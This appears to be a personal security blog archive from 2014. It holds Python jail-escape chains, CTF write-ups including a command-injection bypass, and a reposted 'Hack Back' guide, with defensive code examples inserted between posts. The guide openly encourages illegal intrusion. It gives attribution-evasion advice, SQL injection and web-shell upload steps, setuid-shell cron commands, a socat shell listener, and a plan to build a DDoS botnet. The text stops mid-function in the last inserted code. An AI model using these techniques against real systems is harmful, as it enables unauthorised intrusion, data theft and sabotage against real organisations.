Thursday, December 11, 2014

Python jailbreak

This is a very common method to escape from a python jail.

The key idea is obtaining the <warnings.catch_warnings> class

# try to get <class 'warnings.catch_warnings'>
for i, j in enumerate({}.__class__.__base__.__subclasses__()):
    print(i, j)

# or another alternative way
print([c for c in {}.__class__.__base__.__subclasses__()  if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os'))

# The 59 here is warnings.catch_warnings
w = ().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')

w = [].__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')

w = {}.__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os')

# func_globals is the Python 2 spelling of a function's globals (__globals__ in Python 3)
w = ().__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]

w = [].__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]

w = {}.__class__.__base__.__subclasses__()[59].__init__.func_globals["linecache"].__dict__["os"]

# all of the above are equivalent to
import os
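
Seen from the side of a service that evaluates user-supplied Python, the chains above share one trait: they reach a module only through dunder attributes and a couple of internal names. The following is an added example, not code from the original post: a static check that parses submitted source without running it and reports those accesses. The function names and the benign sample are assumptions made for illustration; it targets Python 3.9+.

```python
import ast

# Non-dunder attribute names that appear in the chains shown above.
EXTRA_PIVOTS = {"func_globals", "_module"}


def _is_dunder(name):
    return len(name) > 4 and name.startswith("__") and name.endswith("__")


def find_introspection(source):
    """Return sorted (line, name) pairs for every dunder attribute access,
    known pivot attribute, or dunder string subscript found in `source`.
    The source is only parsed, never executed."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute):
            if _is_dunder(node.attr) or node.attr in EXTRA_PIVOTS:
                findings.add((node.lineno, node.attr))
        elif isinstance(node, ast.Subscript):
            key = node.slice  # Python 3.9+: the index expression itself
            if (isinstance(key, ast.Constant) and isinstance(key.value, str)
                    and _is_dunder(key.value)):
                findings.add((node.lineno, key.value))
    return sorted(findings)


def should_reject(source):
    """Policy for an expression-evaluation service: refuse input that does
    not parse or that touches object internals."""
    try:
        return bool(find_introspection(source))
    except SyntaxError:
        return True


# The two chain shapes from the post, held as inert strings.
CHAIN_BUILTINS = ("w = ().__class__.__base__.__subclasses__()[59]()"
                  "._module.__builtins__['__import__']('os')")
CHAIN_GLOBALS = ("w = [].__class__.__base__.__subclasses__()[59]"
                 ".__init__.func_globals[\"linecache\"].__dict__[\"os\"]")
# Constructed benign input for comparison.
BENIGN = "total = sum(item.price * item.qty for item in cart.items)"

if __name__ == "__main__":
    for label, src in (("builtins chain", CHAIN_BUILTINS),
                       ("globals chain", CHAIN_GLOBALS),
                       ("benign", BENIGN)):
        names = [name for _, name in find_introspection(src)]
        print(label, "reject" if should_reject(src) else "allow", names)
```

A name filter like this is a review and logging aid. It does not make evaluating untrusted input safe, which needs isolation at the process or OS level.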

Sunday, December 7, 2014


A lot of hacking is playing with other people, you know, getting them to do strange things. -- Steve Wozniak

Tuesday, November 25, 2014

金盾 2014 Game 9 - You know who.

At first glance, I guessed the encryption might be some sort of Caesar cipher, so I just used ipython to figure it out.

#!/usr/bin/env python3
jbnh ybce t owxh xtsix rod d hqoi edheoi swie rvz zee zfozr mb ihsirjbp zla zfhfso dx tsi, uph xrwf cw tgz mb lqf xkvbopsfvvk, vbo wlqfv pvg yrxtwez ovlw wts nhpzo qsf vroz utyiz hf mcs nkmxr. fgxs dki somx csc d puhkez ftgmzu yhjr zi vqr mxgjpw, atwta nitwip vvk nc hhpx hyto gsh aaicw isghv isrk vbjwlubx xggp; vs evv pvg loammj vvzwhh 'xwkmgs chh dwubiu srsp.'vkmk://zlrhm.oqnmshhfewkxn.bpw/wqgrfz.xaj
In [25]: [ord('oqnmshhfewkxn.bpw'[i]) - ord(''[i])  for i in range(len('oqnmshhfewkxn.bpw'))]
Out[25]: [14, -9, -7, -5, 14, -15, 3, 4, -14, 14, -9, 19, -5, 0, -12, 11, 3]
In [26]: [ord(c) for c in "voldemort"]
Out[26]: [118, 111, 108, 100, 101, 109, 111, 114, 116]
In [27]: [ord(c)-ord('a') for c in "voldemort"]
Out[27]: [21, 14, 11, 3, 4, 12, 14, 17, 19]
In [28]: [ord(c)-ord('a')-26 for c in "voldemort"]
Out[28]: [-5, -12, -15, -23, -22, -14, -12, -9, -7]
In [29]: [ord('vkmk'[i]) - ord('http'[i])  for i in range(len('http'))]
Out[29]: [14, -9, -7, -5]
In [30]: [26 + ord('oqnmshhfewkxn.bpw'[i]) - ord(''[i])  for i in range(len('oqnmshhfewkxn.bpw'))]
Out[30]: [40, 17, 19, 21, 40, 11, 29, 30, 12, 40, 17, 45, 21, 26, 14, 37, 29]
In [33]: [(26 + ord('oqnmshhfewkxn.bpw'[i]) - ord(''[i]))  for i in range(len('oqnmshhfewkxn.bpw'))]
Out[33]: [40, 17, 19, 21, 40, 11, 29, 30, 12, 40, 17, 45, 21, 26, 14, 37, 29]
In [34]: [(26 + ord('oqnmshhfewkxn.bpw'[i]) - ord(''[i]))%26  for i in range(len('oqnmshhfewkxn.bpw'))]
Out[34]: [14, 17, 19, 21, 14, 11, 3, 4, 12, 14, 17, 19, 21, 0, 14, 11, 3]
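f = open('game9.txt', 'r')
idx = 0
# offsets of the key "voldemort" from 'a' (see Out[27] above)
perm = [21, 14, 11, 3, 4, 12, 14, 17, 19]
for line in f:
    for c in line:
        if ord('a') <= ord(c) <= ord('z'):
            # shift each lowercase letter back by the current key offset
            print(chr((ord(c) - ord('a') + 52 - perm[idx]) % 26 + ord('a')), end='')
            idx += 1
            idx %= 9
        else:
            # everything else passes through and does not consume key
            print(c, end='')
f.close()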
once upon a time there was a dear little girl who was loved by everyone who looked at her, but most of all by her grandmother, and there was nothing that she would not have given to the child. once she gave her a little riding hood of red velvet, which suited her so well that she would never wear anything else; so she was always called 'little red riding hood.'
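
The ipython session above is a known-plaintext attack on a repeating-key shift (Vigenère) cipher: subtracting a guessed plaintext from the ciphertext exposes key letters. As an added example (not the author's code), the same steps as functions, run on strings taken from the post; the function names are assumptions, and `recover_key` goes one step beyond the session by finding the key period from a longer crib.

```python
A = ord("a")


def shift_stream(cipher, plain):
    """Key letters implied by aligned ciphertext / known-plaintext letters
    (the subtraction done by hand in the session, reduced mod 26)."""
    return "".join(chr((ord(c) - ord(p)) % 26 + A)
                   for c, p in zip(cipher, plain)
                   if "a" <= c <= "z" and "a" <= p <= "z")


def key_phase(key, fragment):
    """Index in the repeating key at which `fragment` starts, or -1."""
    repeated = key * (len(fragment) // len(key) + 2)
    return repeated.find(fragment)


def recover_key(cipher, plain):
    """Shortest repeating unit of the key stream exposed by a crib."""
    stream = shift_stream(cipher, plain)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i + period]
               for i in range(len(stream) - period)):
            return stream[:period]
    return stream


def decrypt(text, key, phase=0):
    """Shift each a-z letter back by the key; other characters pass
    through and do not advance the key position."""
    out, i = [], phase
    for ch in text:
        if "a" <= ch <= "z":
            k = ord(key[i % len(key)]) - A
            out.append(chr((ord(ch) - A - k) % 26 + A))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    # Crib from the post: the trailing "vkmk://" is assumed to be "http://".
    fragment = shift_stream("vkmk", "http")
    print("key fragment:", fragment)
    print("phase in 'voldemort':", key_phase("voldemort", fragment))
    # First words of the ciphertext from the post.
    print(decrypt("jbnh ybce t owxh", "voldemort"))
    print(recover_key("jbnh ybce t owxh", "once upon a time"))
```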

After decoding the secret text, we got a picture and found some information in its EXIF data:

ImageDescription    928iSfNYUQdaN6lM4nS080BI++VUy7n8wQZ+P89Z5O0kdWYmbuaN6VAq/Ulokd6a/QBll6fg0ml7WWTKcUK5ANW4wUPRZyZbdZWbTAHLkHFd3rvnUzP0SIswfV83PwW+
Make    nokia
Model   3310
XResolution 1
YResolution 1
ResolutionUnit  None
Artist  aes
YCbCrPositioning    Centered
Copyright   256bit

But we failed to find the decryption key for the AES-256 encryption.

After the game, our problem setter told us the AES key is just very simple: little red riding hood without spaces.

Monday, November 3, 2014

Archlinux: Taiwan is NOT a Province of China anymore

An annoying bug in Archlinux for a long time is that the official guys always take the ISO standard for names of countries and regions which is totally wrong.

Taiwan is NOT a Province of China!

Recently, they changed it back to Taiwan. :)

Sunday, November 2, 2014

Converting Markdown to reStructuredText

I hate reStructuredText; it is not readable for me. But still, in some cases I have to hand in some stuff in RST.

pandoc is a markup language converter written in Haskell (WTF?).


pandoc -f markdown -t rst -o README.rst

pandoc --from=markdown --to=rst --output=README.rst

pandoc [OPTIONS] [FILES]
Input formats:  docbook, docx, epub, haddock, html, json, latex, markdown,
                markdown_github, markdown_mmd, markdown_phpextra,
                markdown_strict, mediawiki, native, opml, org, rst, t2t,
Output formats: asciidoc, beamer, context, docbook, docx, dokuwiki, dzslides,
                epub, epub3, fb2, haddock, html, html5, icml, json, latex, man,
                markdown, markdown_github, markdown_mmd, markdown_phpextra,
                markdown_strict, mediawiki, native, odt, opendocument, opml,
                org, pdf*, plain, revealjs, rst, rtf, s5, slideous, slidy,
                texinfo, textile
                [*for pdf output, use latex or beamer and -o FILENAME.pdf]

Tuesday, September 16, 2014

Sunday, September 14, 2014

Running vim without any configuration

Lots of people use a very huge config for vim. It makes me suck.

vim -u NONE

allows you to run an original version of vim. It's pretty useful, especially when temporarily working on other people's vim.

Monday, August 25, 2014

HITCON CTF 2014 experience

I have no idea why Google dropped almost all my pictures in this post. But I didn't keep original ones after I uploaded, sorry.

I was still wondering whether I should write this writeup in English or Chinese. Some of my friends in Taiwan can't (or don't want to) read English articles, so I decided to write this post in Chinese and translate the important parts to English. It also conveniently keeps foreign teams from stealing our tricks (just kidding).

You can read the write-up by my senior schoolmate 寬寬 first :(
Here's another write up from @Bletchley131

First, congratulations to fuzzi3 (富士山, Mt. Fuji) from Japan, a super powerful team. It has lots of famous CTF players from Hokkaido, Osaka and Tokyo (北海道, 大阪 & 東京), and some of them are members of the team "binja" (as in binary ninja) that made the Defcon 22 final. Although they didn't have as much luck at Defcon as team HITCON from Taiwan, being strong enough to reach the Defcon final makes them an earthshaking competitor for us.

According to my irresponsible twitter archaeology, the members of team fuzzi3 include @akiym (dodododo), team newbie (@mage_1868 + @hority), team katagaitai (@bata_24), team ε-δ Epsilon-Delta ( and the very frequent hitcon attendees 勇士Q (@ucq) & @int03. Basically, the strongest people in Japan that I know of all came! lol

Here's the full member list (?)

Our team is "BambooFox" (竹狐), the mascot of our school. We're a combination of two security labs, DSNS & SQLab (CRAX), both very high ranking teams in previous HITCON wargames, plus some friends in NCTU (National Chiao Tung University).

Personally, I had decided to take a year off from the HITCON wargame, but after the invitation of Professor Shih-Kun Huang, I joined the game with the experts of SQLab and DSNS lab. I still stuck to my original plan of vacation mode: I was taking a vacation in Chicago that weekend, only chatted on trello boards and Skype, and played for probably less than 24 hours, so I didn't actually help our team. :( After I contributed the two easiest challenges, the challenges that opened next were all outside the areas I'm familiar with.
But in the final hours, my teammates told me there was an ELF in HSA format (a Brig file), a challenge related to the product I work on, and I was astonished. My work during my internship in the States is fixing bugs in the HSA simulators! lol. The challenge (girby) was a time-consuming computation, though, and after I finished writing the program I didn't have enough time to compute the key. Anyway, I made some friends on twitter after the game.

Here's the final ranking and solved challenges.

Thanks to our team leader 達達 (ddaa) for arranging the computer rooms at school and the other related stuff. Thank you for the hard work!
We used Skype and a trello board to share and record game information internally; it seems lots of CTF teams use these two tools nowadays XD Even with them, though, information exchange was still not very real-time, which led to several people writing the same program at the same time.


This is a web challenge. I've never been good at web challenges, even though I do have real-world experience hacking websites (I'll go face the wall). The challenge is a cgi script that can execute a few common commands: ping/traceroute/curl. I tried ping -c and found that we could partially inject commands into the cgi script. What came to mind was the way some software is installed, using curl and piping the downloaded content to bash or another program to execute it, like cpanminus:

curl -L | perl - App::cpanminus

or curl -L url | bash

The normal pipe (|) seemed useless in this case. After trying lots of fuzzing characters, quoting and escaping, "\|" turned out to be the correct one to execute a command after the pipe. I used ls / cat for directory listing and found the key file under the root directory, owned by another user "key", so the web server could not read it. But there was a read_key executable that could read it out, and running it spat out the key. Done!
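
The root cause in the challenge above is request input reaching a shell command line. As an added example (not the challenge's code, which is not shown on this page), here is that assumed pattern beside a hardened form that validates the target and builds an argument vector for execution without a shell. All function names and the sample inputs are constructed for illustration.

```python
import ipaddress
import re

# One DNS label: letters, digits, hyphens; cannot start or end with a hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
MAX_COUNT = 10


def unsafe_command_line(host, count):
    """'Before' pattern (assumed): request parameters pasted into a string
    that a shell will parse, so quoting and metacharacters in `host`
    change what runs. Built only for comparison; never executed here."""
    return "ping -c %s %s" % (count, host)


def valid_target(host):
    """True for an IP literal or a plain DNS name, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    if not host or len(host) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in host.split("."))


def safe_ping_argv(host, count):
    """'After' pattern: validate, then return an argv list meant for
    subprocess.run(argv, shell=False, timeout=...). No shell parses the
    input, and a value starting with '-' cannot be taken as an option."""
    if not re.fullmatch(r"[0-9]{1,2}", count) or not 1 <= int(count) <= MAX_COUNT:
        raise ValueError("count must be an integer from 1 to %d" % MAX_COUNT)
    if not valid_target(host):
        raise ValueError("target must be an IP address or host name")
    return ["ping", "-c", str(int(count)), host]


def accepted(host, count):
    """Convenience wrapper: does the hardened builder accept this request?"""
    try:
        safe_ping_argv(host, count)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed requests: two ordinary ones and three malformed ones.
    samples = [("192.0.2.10", "3"), ("example.com", "1"),
               (r"192.0.2.10 \| id", "1"), ("-f", "1"), ("example.com", "1; id")]
    for host, count in samples:
        print(repr(host), repr(count), "accepted" if accepted(host, count) else "rejected")
```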

Special thanks to @Jokercatz

During the ctf game, I was enjoying my vacation, so I didn't have more pics /flee

Maze is a purely human-powered challenge. The puzzle is a nethack-style maze generated from QR codes, and we used lots of human resources to "brute force" it orz.

The Japanese hacker @takesako gave a very nice talk, "Polyglot Programming and Web Security", at OSDC 2010. Since then I've been a fan of polyglot programming, it's super cool!
For the challenge this year I had no time to work on it myself (I was busy playing), so I could only help my teammates by sharing my experience with polyglot programming. It was super effective and helped them solve the challenge! ^_^
But I didn't do well on the Haskell part Q_Q

The core concept of polyglot programming is to use macros, or to make the overlapping code of each language a comment for the others as far as possible (see below).
In C, the #define macro can be used for substitutions, and since the line starts with # it is ignored as a comment by Perl/Python/Ruby.
In Python, we can use """ (the multiline doc string) to cover non-Python code.
In C, use /* */ to cover other languages.
#*/ can be used as the ending of a polyglot program: it ends a C-style comment and is itself a comment for Perl/Python.
I'm not familiar with Haskell, but we should be able to use {- ... -} for multiline comments, or use assignment for some symbols.
Trigraphs (already in C90) and digraphs (introduced in the 1995 amendment to C90) can be used to avoid some special characters.
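
A small C/Python polyglot built from two of the tricks listed above (a #define line that Python reads as a comment, and a closing #*/), given as an added example rather than the team's solution. The same file is meant to be compiled as C99 or run with Python 3; the greeting strings and the function name are constructed.

```python
#include <stdio.h>
#define pass int main(void) { puts("hello from C"); return 0; }  // C: macro, Python: comment
pass
#/*
# From the line above down to the last line of the file, C sees one block
# comment sitting behind an empty "#" directive, while Python sees ordinary
# source. Python-only code goes here.
def greet():
    return "hello from Python"


if __name__ == "__main__":
    print(greet())
#*/
```

For C, the `pass` on the third line expands to the whole `main` function; for Python it is a no-op statement.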

Final codes:

girby is an ELF wrapping a Brig file, which is the binary form of HSAIL. I'm now doing some bug fixing on the HSA simulator ... orz
I spent too much time in the Museum of Science and Industry in Chicago on Sunday; when it was a bit past 6 am in Taiwan and I was finally told it was an HSA-related challenge, I was having some fancy Italian food in RL Restaurant ( There was not much game time left. After analyzing the challenge with my teammates, I wrote the host code for the HSA simulator to launch the kernel (girby) and got it running on a teammate's Linux box, but it's a time consuming algorithm, so ... 残念でした.

The night before I went to Chicago, I was joking with my brilliant colleague Jack about security issues around HSA: since we can modify the contents of host memory (CPU side), maybe some bad guys will write a "looks good" WebGL kernel that draws a 3D engine but secretly does some bad stuff ... XDDDD Ouch!!! The HSA-related problem was IN the HITCON game!!! T_T

@winesap > darkx: It's not infinity i think, just very very slow :D

Some other references about HSA can be found here.

I just finished this mess of a post. Anyway, I enjoyed the game; our teammates are powerful, and compared to them my personal contribution was not much... I think maybe I'll really take a rest next year, depending on how things go. Thanks to the new friends from team fuzzi3 on Twitter; the other teams are strong and nice, too. Well, security for me has always been just a game, an amateur hobby, especially after a certain incident :P I should not put too much into it, and should focus on studying compiler techniques instead :p

Friday, August 15, 2014

Vim split window scrollbind

Sometimes you want vim to scroll two windows together (like in vimdiff).

:set scb
:set scrollbind

# toggle the option
:set scb!


Thursday, August 14, 2014

[Backup] A DIY Guide for those without the patience to wait for whistleblowers

This is a backup of a really nice hacking tutorial. You can find the original link on pastebin

Thanks to all gifted hackers inspiring me. :D

Happy hacking.

- x4r


                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
     A DIY Guide for those without the patience to wait for whistleblowers

--[ 1 ]-- Introduction

I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz
it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple
it is, and to hopefully inform and inspire you to go out and hack shit. If you
have no experience with programming or hacking, some of the text below might
look like a foreign language. Check the resources section at the end to help you
get started. And trust me, once you've learned the basics you'll realize this
really is easier than filing a FOIA request.

--[ 2 ]-- Staying Safe

This is illegal, so you'll need to take some basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
   probably sufficient, it's better to not use an internet connection connected
   to your name or address. A cantenna, aircrack, and reaver can come in handy


As long as you follow common sense like never do anything hacking related
outside of Whonix, never do any of your normal computer usage inside Whonix,
never mention any information about your real life when talking with other
hackers, and never brag about your illegal hacking exploits to friends in real
life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable
for some things like web browsing, when it comes to using hacking tools like
nmap, sqlmap, and nikto that are making thousands of requests, they will run
very slowly over Tor. Not to mention that you'll want a public IP address to
receive connect back shells. I recommend using servers you've hacked or a VPS
paid with bitcoin to hack from. That way only the low bandwidth text interface
between you and the server is over Tor. All the commands you're running will
have a nice fast connection to your target.

--[ 3 ]-- Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and
domain names, and reverse whois lookups to find all IP address space and domain
names associated with an organization.


For an example let's take Blackwater. We start out knowing their homepage is at Running -dns we find the subdomains:

Now we do whois lookups and find the homepage of is hosted on
Amazon Web Service, while the other IPs are in the range:
NetRange: -
CustName:       Blackwater USA
Address:        850 Puddin Ridge Rd

Doing a whois lookup on reveals it's also registered to the same
address, so we'll use that as a string to search with for the reverse whois
lookups. As far as I know all the actual reverse whois lookup services cost
money, so I just cheat with google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup
"850 Puddin Ridge Rd" inurl:domaintools

Now run -range on the IP ranges you find to lookup dns names, and -dns on the domain names to find subdomains and IP addresses. Do more
whois lookups and repeat the process until you've found everything.

Also just google the organization and browse around its websites. For example on we find links to a careers portal, an online store, and an employee
resources page, so now we have some more:

If you repeat the whois lookups and such you'll find seems to
not be hosted or maintained by Blackwater, so scratch that off the list of
interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable
was simply a whois lookup of which found it registered to the name
"FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds, which redirects to now you've got some idea how I map out a target.
This is actually one of the most important parts, as the larger the attack
surface that you are able to map out, the easier it will be to find a hole
somewhere in it.

--[ 4 ]-- Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside
from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn't? Sometimes companies will have services
running that require no authentication and just assume it's safe because the url
or IP to access it isn't public. Maybe fierce found a git subdomain and you can
go to git.companyname.come/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows
anonymous read or write access to an important directory. Maybe they have a
database server with a blank admin password (lol stratfor). Maybe their embedded
devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's
default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap
will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren't intended
for public viewing like or you'll often find
interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,
webserver/backup/, webserver/phpinfo.php, and a few thousand other common
mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools
like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,
publicly known vulnerability, or other easy way in. If not, it's time to move
on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used
projects, so try those first. I use ZAP [5], and some combination of its
automated tests along with manually poking around with the help of its
intercepting proxy.

6) For the non-custom software they're running, get a copy to look at.  If it's
free software you can just download it. If it's proprietary you can usually
pirate it. If it's proprietary and obscure enough that you can't pirate it you
can buy it (lame) or find other sites running the same software using google,
find one that's easier to hack, and get a copy from them.


For the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the
  login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn't recognize it, so the next question I want answered is if this
  is a custom website by Gamma, or if there are other websites using the same

* I view the page source to find a URL I can search on (index.php isn't
  exactly unique to this software). I pick Scripts/scripts.js.php, and google:

* I find there's a handful of other sites using the same software, all coded by
  the same small webdesign firm. It looks like each site is custom coded but
  they share a lot of code. So I hack a couple of them to get a collection of
  code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum
up views: "In a sophisticated, multi-step attack, hackers first compromised a
web design firm in order to acquire confidential data that would aid them in
attacking Gamma Group..."

But it's really quite easy, done almost on autopilot once you get the hang of
it. It took all of a couple minutes to:

* google allinurl:"Scripts/scripts.js.php" and find the other sites

* Notice they're all sql injectable in the first url parameter I try.

* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with
  the option --tamper='tamper/'

* Acquire the admin login information, login and upload a php shell [1] (the
  check for allowable file extensions was done client side in javascript), and
  download the website's source code.


Looking through the source code they might as well have named it Damn Vulnerable
Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in
javascript, and if you're unauthenticated the admin page just sends you back to
the login page with a Location header, but you can have your intercepting proxy
filter the Location header out and access it just fine.


Heading back over to the finsupport site, the admin /BackOffice/ page returns
403 Forbidden, and I'm having some issues with the LFI, so I switch to using the
sqli (it's nice to have a dozen options to choose from). The other sites by the
web designer all had an injectable print.php, so some quick requests to: and 1=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's
database admin! For MySQL this means you can read and write files. It turns out
the site has magicquotes enabled, so I can't use INTO OUTFILE to write files.
But I can use a short script that uses sqlmap --file-read to get the php source
for a URL, and a normal web request to get the HTML, and then finds files
included or required in the php source, and finds php files linked in the HTML,
to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support
tickets, and there's no check on the file extension. So I pick a username and
password out of the customer database, create a support request with a php shell
attached, and I'm in!

--[ 5 ]-- (fail at) Escalating

< got r00t? >
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].


finsupport was running the latest version of Debian with no local root exploits,
but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user
www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell

wait an hour, and ....nothing. Turns out that while the cron process is running
it doesn't seem to be actually running cron jobs. Looking in the webalizer
directory shows it didn't update stats the previous month. Apparently after
updating the timezone cron will sometimes run at the wrong time or sometimes not
run at all and you need to restart cron after changing the timezone. ls -l
/etc/localtime shows the timezone got updated June 6, the same time webalizer
stopped recording stats, so that's probably the issue. At any rate, the only
thing this server does is host the website, so I already have access to
everything interesting on it. Root wouldn't get much of anything new, so I move
on to the rest of the network.

--[ 6 ]-- Pivoting

The next step is to look around the local network of the box you hacked.  This
is pretty much the same as the first Scanning & Exploiting step, except that
from behind the firewall many more interesting services will be exposed. A
tarball containing a statically linked copy of nmap and all its scripts that you
can upload and run on any box is very useful for this. The various nfs-* and
especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport's local network was another
webserver serving up a folder called 'qateam' containing their mobile malware.

--[ 7 ]-- Have Fun

Once you're in their networks, the real fun starts. Just use your imagination.
While I titled this a guide for wannabe whistleblowers, there's no reason to
limit yourself to leaking documents. My original plan was to:
1) Hack Gamma and obtain a copy of the FinSpy server software
2) Find vulnerabilities in FinSpy server.
3) Scan the internet for, and hack, all FinSpy C&C servers.
4) Identify the groups running them.
5) Use the C&C server to upload and run a program on all targets telling them
   who was spying on them.
6) Use the C&C server to uninstall FinFisher on all targets.
7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some
interesting documents but no copy of the FinSpy server software that I had to
make do with the far less lulzy backup plan of leaking their stuff while
mocking them on twitter.
Point your GPUs at and crack the password
already so I can move on to step 2!

--[ 8 ]-- Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit
is just one way to hack, probably better suited to those with a background in
programming. There's no one right way, and any method that works is as good as
any other. The other main ways that I'll state without going into detail are:

1) Exploits in web browsers, java, flash, or microsoft office, combined with
emailing employees with a convincing message to get them to open the link or
attachment, or hacking a web site frequented by the employees and adding the
browser/java/flash exploit to that.
This is the method used by most of the government hacking groups, but you don't
need to be a government with millions to spend on 0day research or subscriptions
to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit
for a couple thousand, and rent access to one for much less. There's also
metasploit browser autopwn, but you'll probably have better luck with no
exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
of the time.
The infosec industry invented a term to make this sound like some sort of
science: "Social Engineering". This is probably the way to go if you don't know
too much about computers, and it really is all it takes to be a successful
hacker [0].


--[ 9 ]-- Resources


  (all his other blog posts are great too)
* (start at Exploit writing tutorial part 1)
  One trick it leaves out is that on most systems the apache access log is
  readable only by root, but you can still include from /proc/self/fd/10 or
  whatever fd apache opened it as. It would also be more useful if it mentioned
  what versions of php the various tricks were fixed in.
  Get usable reverse shells with a statically linked copy of socat to drop on
  your target and:
  target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
  host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
  It's also useful for setting up weird pivots and all kinds of other stuff.


* The Web Application Hacker's Handbook
* Hacking: The Art of Exploitation
* The Database Hacker's Handbook
* The Art of Software Security Assessment
* A Bug Hunter's Diary
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system
administrator for setting up and administering networks will also be useful for
exploring them. This includes familiarity with the windows command prompt and unix
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
networking, etc.

--[ 10 ]-- Outro

You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
tool. It's not selling hacking tools that makes Gamma evil. It's who their
customers are targeting and with what purpose that makes them evil. That's not
to say that tools are inherently neutral. Hacking is an offensive tool. In the
same way that guerrilla warfare makes it harder to occupy a country, whenever
it's cheaper to attack than to defend it's harder to maintain illegitimate
authority and inequality. So I wrote this to try to make hacking easier and more
accessible. And I wanted to show that the Gamma Group hack really was nothing
fancy, just standard sqli, and that you do have the ability to go out and take
similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
hackers, dissidents, and criminals!
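
The unix-privesc-check warnings quoted in section 5 of the guide above (cron scripts run as root but writable by www-data) describe a misconfiguration an administrator can audit for directly. The following is an added example, not part of the backed-up guide or of unix-privesc-check: it reports cron files and directories that an account other than root could modify. The function names, the `trusted_uid`/`trusted_gid` parameters and the demo tree are assumptions made for illustration.

```python
import os
import stat
import tempfile

CRON_NAMES = ("crontab", "cron.d", "cron.hourly", "cron.daily",
              "cron.weekly", "cron.monthly")


def write_problems(st, trusted_uid=0, trusted_gid=0):
    """Reasons why an account other than the trusted one can modify the
    object described by the os.stat() result `st`."""
    problems = []
    if st.st_uid != trusted_uid:
        problems.append("owned by uid %d" % st.st_uid)
    if st.st_mode & stat.S_IWGRP and st.st_gid != trusted_gid:
        problems.append("writable by gid %d" % st.st_gid)
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def audit_cron(root="/etc", trusted_uid=0, trusted_gid=0):
    """Return [(path, [problem, ...])] for cron files and directories under
    `root` that a non-trusted account could change. A writable directory
    counts too, because its entries can be replaced."""
    findings = []
    for name in CRON_NAMES:
        top = os.path.join(root, name)
        if not os.path.exists(top):
            continue
        paths = [top]
        if os.path.isdir(top):
            paths += [os.path.join(top, e) for e in sorted(os.listdir(top))]
        for path in paths:
            try:
                st = os.stat(path)  # follows symlinks: cron runs the target
            except OSError:
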